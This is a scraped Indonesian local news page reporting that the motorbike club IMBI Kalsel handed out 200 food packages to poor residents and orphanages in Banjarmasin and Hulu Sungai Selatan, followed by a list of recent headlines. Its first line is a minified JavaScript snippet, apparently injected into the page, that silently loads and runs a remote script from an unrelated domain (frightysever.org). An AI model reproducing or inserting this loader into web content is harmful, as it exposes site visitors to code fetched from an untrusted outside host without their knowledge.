(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,'script','https://frightysever.org/Bgkc244P');
Kota Banjarmasin

Baksos IMBI Kalsel Bagikan Paket Sembako


KANALKALIMANTAN.COM, BANJARMASIN – Ratusan paket sembako dibagikan oleh pengurus Ikatan Motor Besar Indonesia (IMBI) Kalimantan Selatan (Kalsel) kepada warga kurang mampu, Sabtu (2/9/2023) petang.

Pembagian dilakukan door to door ke rumah warga dan ke sejumlah panti asuhan yang ada di Kota Banjarmasin dan Kabupaten Hulu Sungai Selatan (HSS).

Wakil Ketua Umum IMBI Kalsel Dr H Riko MKes C WPCM mengatakan, ada 200 paket sembako disiapkan pada bakti sosial kali ini. Paket sembako itu berisi telur, gula, beras, minyak, dan kebutuhan pokok rumah tangga lainnya.

Baca juga: Proyek Siring Ponpes Darussalam Martapura Dilanjutkan, Akhir Tahun Rampung

“Pembagian hari ini ada dua tempat, pertama di Kabupaten Hulu Sungai Selatan ke Tahfiz Al Qur’an sebanyak 70 paket, dan di Banjarmasin ada 130 paket sambako,” katanya disela pembagian di Banjarmasin, Sabtu (2/9/2023) petang.

Salah satu yayasan yang diberikan bantuan yaitu Panti Asuhan Putri Hajjah Asiyah yang berada di jalan Sultan Adam, Kecamatan Banjarmasin Utara, Kota Banjarmasin. Selain membagi sembako, juga diberikan bantuan belasan Al Qur’an.

“Paling tidak sembako yang diberikan dapat untuk kebutuhan sehari-hari, walaupun nilainya tidak mencukupi untuk kebutuhan jangka panjang,” ujar Wakil Ketua Umum IMBI Kalsel.

Masih lanjut Dr H Riko, kegiatan bakti sosial pembagian sembako bukan pertama kali dilaksanakan oleh IMBI Kalsel. Pada bulan Ramadhan pihaknya juga melakukan kegiatan sosial yang rutin dilaksanakan setiap tahun.

Baca juga: Incar Kemenangan dari Persis, Coach RD Tak Mau Tergeser dari Papan Atas

“Kalau kegiatan rutin dilaksanakan pada bulan puasa seperti buka bersama dan berbagi kepada anak panti, kali ini kita berbagai kepada para donatur, mudah-mudahan ini bisa dilaksanakan setiap bulan,” ujar Dr H Riko.

Terpisah, Sekjen IMBI Kalsel H Gusti mengungkapkan kegiatan bakti sosial yang dilakukan merupakan bentuk kepedulian IMBI kepada masyarakat yang membutuhkan.

Ia mengatakan, selama ini komunitas motor sering di cap negatif oleh masyarakat. Sehingga melalui bakti sosial tersebut pihaknya ingin membuktikan bahwa komunitas motor tidak negatif seperti yang ada dibenak masyarakat selama ini.

“Jadi ini menunjukkan bahwa klub anak motor itu ada pedulinya dengan masyarakat, jadi ngga nilai negatif saja, tapi kami juga ada nilai positifnya,” tegasnya.

Baca juga: Anies-Cak Imin Resmi Deklarasi Siap Tarung Pilpres 2024

Salah satu warga jalan Sultan Adam, Ranum senang diberikan bantuan paket sembako dari IMBI Kalsel. Sebab, ia yang hanya bekerja mengais becak mengaku pendapatan sehari-hari masih jauh dari kata layak.

Sehingga bantuan yang ia terima berupa satu rak telur, gula, beras, dan lain-lain dapat mengurangi beban pengeluaran di rumah tangganya.

“Bantuannya cukup membantu, bisa meringankan beban kami,” kata penarik becak ini.

Selain kegiatan sosial, sebagai komunitas pecinta motor gede sering melaksanakan touring ke berbagai daerah.

Baca juga: Habisi Nyawa Istri, Suami Paksa Tulis Daftar Selingkuhan

Beberapa waktu lalu, IMBI Kalsel baru saja melaksanakan touring bekerja sama dengan Pengda Jawa Timur dan Pengda Bali.

Tidak hanya tingkat nasional, sejumlah pengurus IMBI Kalsel dikatakan beberapa kali juga pernah mengikuti event internasional seperti yang dilaksanakan di Malaysia, Brunei, dan di Himalaya.

Untuk yang tingkat regional, mereka juga ikut serta dalam kegiatan touring Kemerdekaan yang dilaksanakan oleh Pemerintah Provinsi (Pemprov) Kalsel beberapa waktu lalu.

Dan dalam waktu dekat juga akan berpartisipasi dalam HUT Lanal dengan kegiatan touring dari Banjarmasin ke Liang Anggang. (Kanalkalimantan.com/rizki)

Reporter : rizki

Editor : bie


Muhammad Andi

Recent Posts

Banjarbaru Posisi Kedua Klasemen Sementara Popda Kalsel 2024

KANALKALIMANTAN.COM, BANJARBARU - Sejumlah cabang olahraga (cabor) unggulan membawa kontingen Kota Banjarbaru bertengger di posisi… Read More

37 menit ago

Hasnur Resmi Lamar Partai Golkar, Mencari ‘Pintu’ Koalisi Pilgub Kalsel

KANALKALIMANTAN.COM, BANJARMASIN - Langkah Hasnuryadi Sulaiman untuk maju pada kontestasi Pemilihan Gubernur dan Wakil Gubernur… Read More

2 jam ago

Pasti Maju Pilwali Banjarbaru, Ovie Simpan Nama Pasangan

KANALKALIMANTAN.COM, BANJARBARU - Aditya Mufti Ariffin memastikan akan kembali berkontestasi dalam Pemilihan Kepala Daerah (Pilkada)… Read More

3 jam ago

Soal Caleg Terpilih Mundur atau Tidak Mundur Jika Maju Pilkada, Begini Penjelasan KPU Kalsel

KANALKALIMANTAN.COM, BANJARMASIN - Anggota Komisi Pemilihan Umum (KPU) Provinsi Kalimantan Selatan (Kalsel), Fahmi Failasopa menegaskan… Read More

6 jam ago

Jalan Pangeran Suriansyah Banjarbaru Steril PKL dan Parkir Tepi Jalan

KANALKALIMANTAN.COM, BANJARBARU - Aktivitas Pedagang Kaki Lima alias PKL di sepanjang jalan Pangeran Suriansyah, Kelurahan… Read More

8 jam ago

Wapres Serahkan Motor Perpustakaan Keliling ke Pemkab HSU

KANALKALIMANTAN.COM, JAKARTA - Wakil Presiden RI, KH Ma’ruf Amin secara simbolis menyerahkan bantuan Motor Perpustakaan… Read More

9 jam ago

This website uses cookies.